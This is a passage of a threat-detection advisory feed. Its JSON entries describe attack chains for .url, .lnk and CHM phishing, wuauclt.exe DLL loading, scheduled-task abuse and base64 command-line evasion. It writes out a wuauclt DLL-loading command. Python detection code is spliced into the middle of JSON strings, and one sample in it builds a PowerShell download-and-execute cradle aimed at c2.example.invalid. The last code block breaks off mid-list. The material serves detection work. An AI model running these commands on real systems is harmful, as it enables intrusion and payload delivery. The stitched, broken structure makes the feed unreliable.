campaigns to deliver malicious payloads. These files, when downloaded from non-local sources, may bypass traditional security measures. This detection rule identifies such files by monitoring their creation events on Windows systems. The rule focuses on files with the .url extension and a zone identifier indicating they originated from outside the local network. These files are often delivered via email or malicious websites, tricking users into clicking them, which can lead to the execution of arbitrary commands or the redirection to malicious websites. This technique allows attackers to gain initial access or execute malicious code on the victim\u0026rsquo;s machine.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a phishing email or a malicious website containing a link to a .url file.\u003c/li\u003e\n\u003cli\u003eThe victim clicks the link, resulting in the download of the .url file to their Windows system.\u003c/li\u003e\n\u003cli\u003eThe .url file is created on the filesystem, triggering a file creation event.\u003c/li\u003e\n\u003cli\u003eThe operating system assigns a Zone Identifier to the file, marking it as originating from an external source.\u003c/li\u003e\n\u003cli\u003eThe victim double-clicks the .url file, which contains a URL pointing to a malicious website or an executable.\u003c/li\u003e\n\u003cli\u003eThe operating system attempts to open the URL using the default web browser or execute the embedded command.\u003c/li\u003e\n\u003cli\u003eIf the URL points to a malicious website, the victim may be prompted to download and execute malware.\u003c/li\u003e\n\u003cli\u003eThe malware executes, potentially leading to system compromise, data theft, or other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the execution of arbitrary commands, redirection to malicious 
websites, and subsequent malware infection. If successful, attackers can compromise user systems, steal sensitive information, or establish a foothold for further malicious activities within the organization\u0026rsquo;s network. The impact can range from individual system compromise to broader network breaches, depending on the attacker\u0026rsquo;s objectives and the extent of the infection.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDownloaded URL Files Created\u003c/code\u003e to your SIEM to detect the creation of downloaded .url files with a non-local Zone Identifier and tune for your environment.\u003c/li\u003e\n\u003cli\u003eInvestigate any \u003ccode\u003efile creation\u003c/code\u003e events where \u003ccode\u003efile.extension == \u0026quot;url\u0026quot;\u003c/code\u003e and \u003ccode\u003efile.Ext.windows.zone_identifier == 3\u003c/code\u003e using the provided investigation steps in the advisory.\u003c/li\u003e\n\u003cli\u003eUpdate security policies and endpoint protection configurations to block the download and execution of .url files from untrusted sources, as mentioned in the advisory.\u003c/li\u003e\n\u003cli\u003eEducate users on safe downloading practices and the risks associated with opening .url files from untrusted sources, as highlighted in the advisory\u0026rsquo;s false positive analysis.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-04T17:49:12Z","date_published":"2024-01-04T17:49:12Z","id":"/briefs/2024-01-downloaded-url-files/","summary":"This detection rule identifies downloaded .url shortcut files on Windows systems, often used in phishing campaigns, by monitoring their creation events and flagging those from non-local sources, enabling early threat detection.","title":"Detection of Downloaded URL Files Used in Phishing 
Campaigns","url":"https://feed.craftedsignal.io/briefs/2024-01-downloaded-url-files/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows Auto Update Client"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","lolbas","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers are abusing the Windows Update Auto Update Client (wuauclt.exe) to execute arbitrary code by loading malicious DLLs. This technique allows malicious actors to evade defenses by masquerading their activity as legitimate Windows processes. The abuse involves using specific command-line arguments with wuauclt.exe to load a DLL from a user-writable directory. This behavior has been observed in various attacks aimed at evading traditional security measures. This is an effective defense evasion and execution technique, allowing attackers to execute code while blending in with normal system processes, potentially bypassing application control and other security mechanisms.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system through an unrelated method.\u003c/li\u003e\n\u003cli\u003eThe attacker places a malicious DLL in a directory writable by standard users, such as \u003ccode\u003eC:\\Users\\\u0026lt;username\u0026gt;\\\u003c/code\u003e, \u003ccode\u003eC:\\ProgramData\\\u003c/code\u003e, \u003ccode\u003eC:\\Windows\\Temp\\\u003c/code\u003e, or \u003ccode\u003eC:\\Windows\\Tasks\\\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker executes \u003ccode\u003ewuauclt.exe\u003c/code\u003e with the arguments \u003ccode\u003e/RunHandlerComServer\u003c/code\u003e and \u003ccode\u003e/UpdateDeploymentProvider\u003c/code\u003e along with the path to the malicious DLL. 
For example: \u003ccode\u003ewuauclt.exe /RunHandlerComServer /UpdateDeploymentProvider /dll:\u0026lt;path_to_malicious_dll\u0026gt;\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ewuauclt.exe\u003c/code\u003e loads the specified malicious DLL.\u003c/li\u003e\n\u003cli\u003eThe malicious DLL executes arbitrary code within the context of the \u003ccode\u003ewuauclt.exe\u003c/code\u003e process.\u003c/li\u003e\n\u003cli\u003eThe malicious code performs its intended actions, such as establishing persistence, communicating with a C2 server, or escalating privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker may then use the compromised system as a foothold for lateral movement within the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code within a trusted Windows process, potentially bypassing security controls and making detection more difficult. While specific victim counts are unavailable, this technique can be used in targeted attacks against organizations where defense evasion is a priority for the adversary. 
Successful execution can lead to complete system compromise, data theft, or further malicious activities.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eImageLoad via Windows Update Auto Update Client\u003c/code\u003e to detect the execution of \u003ccode\u003ewuauclt.exe\u003c/code\u003e with suspicious arguments.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for \u003ccode\u003ewuauclt.exe\u003c/code\u003e with the arguments \u003ccode\u003e/RunHandlerComServer\u003c/code\u003e and \u003ccode\u003e/UpdateDeploymentProvider\u003c/code\u003e, focusing on DLL paths in user-writable directories.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process-creation and image-load logging to improve visibility into this type of attack.\u003c/li\u003e\n\u003cli\u003eAudit DLLs loaded by \u003ccode\u003ewuauclt.exe\u003c/code\u003e and investigate any unsigned or unexpected DLLs.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-04T12:00:00Z","date_published":"2024-01-04T12:00:00Z","id":"/briefs/2024-01-wuauclt-dll-load/","summary":"The Windows Update Auto Update Client (wuauclt.exe) is being abused to load arbitrary DLLs, a defense evasion technique where malicious activity blends with legitimate Windows software by using specific process arguments and placing DLLs in writable paths.","title":"Abuse of Windows Update Client for DLL Loading","url":"https://feed.craftedsignal.io/briefs/2024-01-wuauclt-dll-load/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft HTML Help system","Elastic Defend","Microsoft Defender XDR","Sysmon","SentinelOne Cloud Funnel","CrowdStrike"],"_cs_severities":["medium"],"_cs_tags":["execution","defense-evasion","compiled-html","windows","proxy-execution"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic"],"content_html":"\u003cp\u003eAttackers are known to deliver malicious payloads 
within compiled HTML files (.chm) to bypass security measures and gain initial access to systems. This technique leverages the Microsoft HTML Help system and its associated executable, hh.exe, to proxy the execution of malicious code. Compiled HTML files can contain various types of content, including HTML documents, images, and scripting languages like VBA, JScript, Java, and ActiveX. By embedding malicious scripts or executables within a .chm file, attackers can trick users into executing them when they open the file. This is particularly effective because hh.exe is a signed binary, which may allow it to bypass certain security controls. The scope of this technique affects Windows systems where the HTML Help system is installed.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a malicious .chm file containing embedded malicious code, such as a PowerShell script or executable.\u003c/li\u003e\n\u003cli\u003eThe attacker delivers the .chm file to the victim via social engineering, such as phishing or malicious websites.\u003c/li\u003e\n\u003cli\u003eThe victim opens the .chm file, causing hh.exe to launch.\u003c/li\u003e\n\u003cli\u003ehh.exe processes the .chm file, rendering its content, which includes the embedded malicious script or executable.\u003c/li\u003e\n\u003cli\u003eThe malicious code executes, often spawning a scripting interpreter like \u003ccode\u003epowershell.exe\u003c/code\u003e or \u003ccode\u003ecmd.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe scripting interpreter executes commands to download additional payloads or perform malicious actions on the system.\u003c/li\u003e\n\u003cli\u003eThe attacker gains initial access to the victim\u0026rsquo;s system.\u003c/li\u003e\n\u003cli\u003eThe attacker escalates privileges and moves laterally within the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 
id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to initial access, code execution, and potentially full system compromise. This can result in data theft, malware installation, and further lateral movement within the network. The severity and impact depend on the permissions of the user running hh.exe and the nature of the malicious payload.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Compiled HTML File Spawning Suspicious Processes\u0026rdquo; to your SIEM to detect instances where \u003ccode\u003ehh.exe\u003c/code\u003e is the parent process of scripting interpreters.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging to provide the necessary data for the Sigma rule to function correctly.\u003c/li\u003e\n\u003cli\u003eMonitor process execution chains for unknown processes originating from \u003ccode\u003ehh.exe\u003c/code\u003e, as mentioned in the investigation guide.\u003c/li\u003e\n\u003cli\u003eImplement email filtering and security awareness training to prevent users from opening malicious .chm files delivered via phishing.\u003c/li\u003e\n\u003cli\u003eBlock the execution of unsigned or untrusted executables in the environment to reduce the risk of malicious code execution.\u003c/li\u003e\n\u003cli\u003eUse endpoint detection and response (EDR) solutions like Elastic Defend, CrowdStrike, Microsoft Defender XDR, and SentinelOne to detect and respond to malicious activity.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T18:30:00Z","date_published":"2024-01-03T18:30:00Z","id":"/briefs/2024-01-compiled-html-execution/","summary":"Adversaries may conceal malicious code in compiled HTML files (.chm) and deliver them to a victim for execution, using the HTML Help executable (hh.exe) to proxy the execution of scripting interpreters and bypass security controls.","title":"Process Activity via 
Compiled HTML File Execution","url":"https://feed.craftedsignal.io/briefs/2024-01-compiled-html-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["phishing","lnk","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection identifies suspicious .lnk files created on Windows systems, especially those downloaded from external sources, which may indicate potential phishing attempts. The rule leverages file creation events and zone identifiers to trace the file\u0026rsquo;s origin. Adversaries exploit shortcut files by embedding malicious commands within them, often distributing these files via phishing campaigns. This can lead to arbitrary code execution upon user interaction. The rule is designed for data generated by Elastic Defend.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eUser receives a phishing email containing a malicious .lnk file.\u003c/li\u003e\n\u003cli\u003eThe user downloads the .lnk file to their Windows system.\u003c/li\u003e\n\u003cli\u003eThe Windows OS marks the file with a Zone Identifier indicating it came from an external source.\u003c/li\u003e\n\u003cli\u003eThe user double-clicks the .lnk file, triggering its execution.\u003c/li\u003e\n\u003cli\u003eThe .lnk file executes embedded commands, such as PowerShell or cmd.exe.\u003c/li\u003e\n\u003cli\u003eThe command downloads and executes a malicious payload from a remote server.\u003c/li\u003e\n\u003cli\u003eThe payload establishes persistence on the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote access and control over the infected host.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the compromise of the user\u0026rsquo;s system, potentially resulting in data theft, malware 
installation, or further propagation of the attack within the network.  The severity of the impact depends on the privileges of the compromised user account and the attacker\u0026rsquo;s objectives. The rule aims to detect and prevent such attacks early in the attack chain, reducing the potential damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Downloaded Shortcut Files\u0026rdquo; to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable Elastic Defend to capture the necessary file creation events for the rule to function.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the rule, paying close attention to the file path, zone identifier, and associated user account.\u003c/li\u003e\n\u003cli\u003eUpdate security policies to restrict the execution of .lnk files from untrusted sources.\u003c/li\u003e\n\u003cli\u003eEducate users about the risks of opening suspicious attachments, especially .lnk files, to prevent initial access.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T18:22:32Z","date_published":"2024-01-03T18:22:32Z","id":"/briefs/2024-01-downloaded-lnk/","summary":"This rule detects potentially malicious .lnk shortcut files downloaded from outside the local network on Windows systems, which are commonly used in phishing campaigns.","title":"Detection of Downloaded Shortcut Files","url":"https://feed.craftedsignal.io/briefs/2024-01-downloaded-lnk/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["medium"],"_cs_tags":["persistence","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection rule identifies suspicious program executions initiated by scheduled tasks on Windows systems. Adversaries often exploit scheduled tasks for persistence and to execute malicious programs. 
This rule focuses on detecting known malicious executables, such as PowerShell, Cmd, and MSHTA, when launched from unusual file paths like user directories or temporary folders. It leverages process lineage analysis, specifically looking for processes spawned by \u003ccode\u003esvchost.exe\u003c/code\u003e with the \u0026ldquo;Schedule\u0026rdquo; argument, to determine if the execution originated from a scheduled task. The rule aims to pinpoint potential threats effectively by excluding benign processes and focusing on suspicious combinations of executables and paths. The rule was last updated on 2026-05-04.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system (e.g., via phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker creates or modifies a scheduled task to execute a malicious payload. This task is designed to run at a specific time or event.\u003c/li\u003e\n\u003cli\u003eThe Windows Task Scheduler service (\u003ccode\u003esvchost.exe\u003c/code\u003e with \u0026ldquo;Schedule\u0026rdquo; argument) initiates the scheduled task.\u003c/li\u003e\n\u003cli\u003eThe scheduled task executes a suspicious executable, such as \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003ecmd.exe\u003c/code\u003e, or \u003ccode\u003emshta.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe suspicious executable is launched from an unusual or suspicious path, such as \u003ccode\u003eC:\\\\Users\\\\\u003c/code\u003e, \u003ccode\u003eC:\\\\ProgramData\\\\\u003c/code\u003e, or \u003ccode\u003eC:\\\\Windows\\\\Temp\\\\\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe executed payload performs malicious activities, such as downloading additional malware, establishing persistence, or exfiltrating data.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains persistence on the system through the scheduled task, allowing for repeated 
execution of the malicious payload.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to maintain persistent access to the compromised system, execute malicious code, and potentially escalate privileges. This can lead to data theft, system compromise, and further lateral movement within the network. The damage includes potential data exfiltration, malware installation, and disruption of normal system operations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging with command line arguments to detect suspicious executions (logs-endpoint.events.process-* and logs-windows.sysmon_operational-*).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious Execution via Scheduled Task\u0026rdquo; to your SIEM to identify potentially malicious processes executed via scheduled tasks. Tune the rule to exclude legitimate software installations or updates (see rule section below).\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on processes with suspicious original file names and command line arguments (process.pe.original_file_name, process.args).\u003c/li\u003e\n\u003cli\u003eMonitor scheduled tasks for unauthorized modifications or additions, as this is a common technique for persistence (registry_set).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T18:00:00Z","date_published":"2024-01-03T18:00:00Z","id":"/briefs/2024-01-suspicious-scheduled-task-runtime/","summary":"This rule identifies execution of suspicious programs via scheduled tasks by looking at process lineage and command line usage, detecting processes such as cscript.exe, powershell.exe, and cmd.exe when executed from suspicious paths like C:\\Users\\ and C:\\ProgramData\\.","title":"Suspicious Execution via Scheduled 
Task","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-scheduled-task-runtime/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["HTML Help"],"_cs_severities":["medium"],"_cs_tags":["execution","defense-evasion","command-and-control","malicious-file","html-help"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAdversaries may conceal malicious code in a compiled HTML file (.chm) and deliver it to a victim for execution. CHM content is loaded by the HTML Help executable program (hh.exe). Attackers can use CHM files to proxy the execution of malicious payloads via a signed binary to bypass security controls, and also to gain initial access to environments via social engineering methods. This rule identifies network connections made by hh.exe, which can indicate abuse to download malicious files or tooling, or a renamed binary masquerading as hh.exe. The detection logic focuses on network connections originating from hh.exe to external IPs, excluding private or reserved IP ranges.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe user receives a compiled HTML file (.chm), often through social engineering tactics such as phishing.\u003c/li\u003e\n\u003cli\u003eThe user opens the .chm file, which is then executed by the HTML Help executable (hh.exe).\u003c/li\u003e\n\u003cli\u003eThe hh.exe process loads and renders the HTML content within the .chm file.\u003c/li\u003e\n\u003cli\u003eEmbedded within the HTML content is malicious JavaScript or other scripting code.\u003c/li\u003e\n\u003cli\u003eThe malicious script executes, initiating a network connection via hh.exe to an external server.\u003c/li\u003e\n\u003cli\u003eThe external server hosts a malicious payload, such as a reverse shell or an executable file.\u003c/li\u003e\n\u003cli\u003ehh.exe downloads the malicious payload to the victim\u0026rsquo;s machine.\u003c/li\u003e\n\u003cli\u003eThe downloaded 
payload is executed, granting the attacker initial access or performing other malicious actions like data exfiltration or lateral movement.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to initial access to a victim\u0026rsquo;s system, potentially bypassing security controls through a signed Microsoft binary. This can result in the download and execution of arbitrary payloads, leading to data exfiltration, lateral movement within the network, or installation of malware. The exploitation can spread rapidly through social engineering, affecting multiple users within an organization. While the severity is rated as medium, the potential for escalation to a critical compromise is high if the attacker gains a foothold in the environment.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process and network monitoring on Windows endpoints, focusing on hh.exe activity (Data Source: Elastic Defend, Sysmon, SentinelOne).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eNetwork Connection via Compiled HTML File\u003c/code\u003e to your SIEM and tune for your environment to detect suspicious network connections initiated by hh.exe.\u003c/li\u003e\n\u003cli\u003eMonitor for hh.exe spawning child processes, which could indicate the execution of downloaded payloads. 
Create a Sigma rule to detect such events.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a compromised host and restrict lateral movement.\u003c/li\u003e\n\u003cli\u003eConduct regular security awareness training to educate users about the risks of opening unsolicited .chm files.\u003c/li\u003e\n\u003cli\u003eInspect the digital signatures of hh.exe and other system binaries to ensure their integrity and authenticity.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T17:00:00Z","date_published":"2024-01-03T17:00:00Z","id":"/briefs/2024-01-hh-exe-network-connection/","summary":"This rule detects network connections initiated by hh.exe, the HTML Help executable, which may indicate the execution of malicious code embedded in compiled HTML files (.chm) to deliver malicious payloads, bypass security controls, and gain initial access via social engineering.","title":"Network Connection via Compiled HTML File","url":"https://feed.craftedsignal.io/briefs/2024-01-hh-exe-network-connection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Endpoint"],"_cs_severities":["high"],"_cs_tags":["defense-evasion","execution","scripting-interpreter","base64","command-line"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis rule identifies the execution of scripting interpreters (Python, PowerShell, Node.js, and Deno) with unusually long command lines containing base64 encoded payloads. The rule focuses on scenarios where the \u003ccode\u003eprocess.command_line\u003c/code\u003e keyword field is not indexed because the value exceeds its length limit, while the complete command line is still searchable in the \u003ccode\u003eprocess.command_line.text\u003c/code\u003e field. Attackers rely on that gap: a rule that only queries the keyword field never sees the oversized command line, which lets them evade traditional command-line inspection and execute malicious content across Windows, macOS, and Linux systems. 
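The destination filter described for this rule (hh.exe connecting to anything outside private or reserved ranges), as an added Python example that is not part of the feed or of the rule it summarises. The event layout, the sample events and the process-name check are constructed; the two public addresses are stand-ins for an attacker-controlled host.

```python
"""Flag network connections from hh.exe to routable (non-private) addresses.

Added example for the compiled-HTML brief.  The event shape and the sample
events are constructed; 1.1.1.1 and 8.8.8.8 stand in for a payload server.
"""
import ipaddress
import ntpath


def is_external(ip_text):
    """True for addresses outside the private/reserved ranges the rule excludes.

    Python's ipaddress also treats the documentation ranges (192.0.2.0/24,
    198.51.100.0/24, 203.0.113.0/24) and benchmarking space as private, so
    those never count as external here.
    """
    ip = ipaddress.ip_address(ip_text)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def is_hh_external_connection(event):
    """Match a network event whose source process is hh.exe talking to a public IP."""
    if ntpath.basename(event["process_executable"]).lower() != "hh.exe":
        return False
    return is_external(event["destination_ip"])


# Constructed sample telemetry (field names loosely follow ECS).
SAMPLE_EVENTS = [
    {"process_executable": "C:\\Windows\\hh.exe", "destination_ip": "10.20.30.40", "destination_port": 80},
    {"process_executable": "C:\\Windows\\hh.exe", "destination_ip": "203.0.113.7", "destination_port": 443},
    {"process_executable": "C:\\Windows\\hh.exe", "destination_ip": "1.1.1.1", "destination_port": 443},
    {"process_executable": "C:\\Windows\\hh.exe", "destination_ip": "fe80::1", "destination_port": 445},
    {"process_executable": "C:\\Program Files\\Browser\\browser.exe", "destination_ip": "1.1.1.1", "destination_port": 443},
    # a copy of hh.exe dropped in a user temp folder: still matched by name
    {"process_executable": "C:\\Users\\bob\\AppData\\Local\\Temp\\hh.exe", "destination_ip": "8.8.8.8", "destination_port": 8080},
]


def alerts(events=SAMPLE_EVENTS):
    """Return (index, executable, destination) for every matching event."""
    return [(i, e["process_executable"], e["destination_ip"])
            for i, e in enumerate(events) if is_hh_external_connection(e)]


if __name__ == "__main__":
    for idx, exe, dst in alerts():
        print(f"event {idx}: {exe} -> {dst}")
```

The name-only match is deliberate: it also catches a binary renamed to hh.exe outside C:\Windows (the last sample), which is why the signature check in the recommendations belongs next to this rule. Note that the 203.0.113.7 sample is not flagged because the library classes TEST-NET-3 as private; swap in a real public address when replaying this against production telemetry.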
This approach allows attackers to embed and execute code without writing it to disk, making it harder to detect. The rule is designed to detect this behavior, allowing for closer inspection of the executed commands and their intent.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system (e.g., via phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker uses PowerShell, Python, Node.js, or Deno to execute commands.\u003c/li\u003e\n\u003cli\u003eA long, base64-encoded string is crafted, designed to evade detection.\u003c/li\u003e\n\u003cli\u003eThe interpreter is invoked with the encoded string passed as an argument, exceeding the length limit of the indexed command-line field.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eprocess.command_line\u003c/code\u003e keyword field is not indexed because of its length, but the full command line is available in \u003ccode\u003eprocess.command_line.text\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe interpreter decodes the argument it was given and executes the payload in memory; only \u003ccode\u003eprocess.command_line.text\u003c/code\u003e retains the full string for the analyst.\u003c/li\u003e\n\u003cli\u003eThe decoded payload performs malicious actions such as downloading malware, establishing persistence, or exfiltrating data.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as gaining control of the system or stealing sensitive information.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to a wide range of malicious activities, including malware installation, data theft, privilege escalation, and system compromise. Because the evasion targets the logging pipeline itself, the activity is difficult to identify and prevent with command-line rules alone. The impact includes potential data breaches, financial losses, and reputational damage. 
The rule\u0026rsquo;s detection helps defenders identify this attack vector and prevent further exploitation of affected systems.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Long Base64 Encoded Command via Scripting Interpreter\u003c/code\u003e to your SIEM to detect this behavior.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by this rule, focusing on the \u003ccode\u003eprocess.command_line.text\u003c/code\u003e field to understand the full command being executed.\u003c/li\u003e\n\u003cli\u003eReview parent processes and execution chains of the interpreter to understand the initial attack vector.\u003c/li\u003e\n\u003cli\u003eImplement controls to restrict the execution of scripting interpreters from untrusted sources.\u003c/li\u003e\n\u003cli\u003eMonitor process execution logs for command lines exceeding a certain length threshold.\u003c/li\u003e\n\u003cli\u003eImprove logging coverage to capture the full command line even when it exceeds standard limits.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T17:00:00Z","date_published":"2024-01-03T17:00:00Z","id":"/briefs/2024-01-03-long-base64-interpreter-cmdline/","summary":"Detection of oversized command lines used by Python, PowerShell, Node.js, or Deno interpreters containing base64 decoding or encoded-command patterns, indicating potential evasion and malicious execution.","title":"Long Base64 Encoded Command via Scripting Interpreter","url":"https://feed.craftedsignal.io/briefs/2024-01-03-long-base64-interpreter-cmdline/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["MSBuild","Elastic Defend","Sysmon","Windows Security Event Logs"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","msbuild"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic"],"content_html":"\u003cp\u003eThe Microsoft Build Engine (MSBuild) is a 
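The oversized-command-line check and the follow-up decode step an analyst runs on process.command_line.text, as an added Python example that is not the feed's rule or Elastic's code. The 1024-character threshold, the marker patterns, the field names and both command lines are assumptions constructed for the example.

```python
"""Oversized interpreter command lines that carry a base64 payload.

Added example for the long-base64 brief: a length threshold and a marker
check select candidate events, then the largest base64 run is decoded as
UTF-16LE (what PowerShell -EncodedCommand expects) or UTF-8 (Python, Node,
Deno style).  The 1024-character threshold, the marker list, the field
names and both command lines are constructed for the example.
"""
import base64
import binascii
import ntpath
import re

INTERPRETERS = {"powershell.exe", "pwsh.exe", "pwsh", "python.exe", "python", "python3",
                "python3.exe", "node.exe", "node", "deno.exe", "deno"}
LENGTH_THRESHOLD = 1024  # assumption: the keyword-field limit the brief describes

# Encoded-command switches and decode calls the four interpreters use.
B64_MARKERS = re.compile(
    r"(?i)(?:-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{100,}|frombase64string"
    r"|b64decode|buffer\.from\([^)]*base64|atob\()")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")


def _looks_like_text(text):
    """Decoded bytes count as script text when nearly every character is ASCII."""
    return bool(text) and sum(c.isascii() for c in text) / len(text) > 0.9


def decode_largest_blob(command_line):
    """Decode the longest base64 run on the command line; UTF-16LE first, then UTF-8."""
    runs = B64_RUN.findall(command_line)
    if not runs:
        return None
    try:
        raw = base64.b64decode(max(runs, key=len), validate=True)
    except (ValueError, binascii.Error):
        return None
    for encoding in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if _looks_like_text(text):
            return text
    return None


def evaluate(event):
    """Return a finding for an oversized base64 interpreter command line, else None."""
    name = ntpath.basename(event["executable"]).lower()
    cmd = event["command_line"]
    if name not in INTERPRETERS or len(cmd) < LENGTH_THRESHOLD:
        return None
    if not B64_MARKERS.search(cmd):
        return None
    return {"interpreter": name, "length": len(cmd), "decoded": decode_largest_blob(cmd)}


# Constructed samples: a padded PowerShell stager and a Python one-liner.
_PS_SCRIPT = ("$noise = 1;" * 120) + \
    "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage2')"
_PS_B64 = base64.b64encode(_PS_SCRIPT.encode("utf-16-le")).decode()
_PY_B64 = base64.b64encode(b"import os\nos.system('id')\n" * 60).decode()

SAMPLE_EVENTS = [
    {"executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": f"powershell.exe -nop -w hidden -enc {_PS_B64}"},
    {"executable": "/usr/bin/python3",
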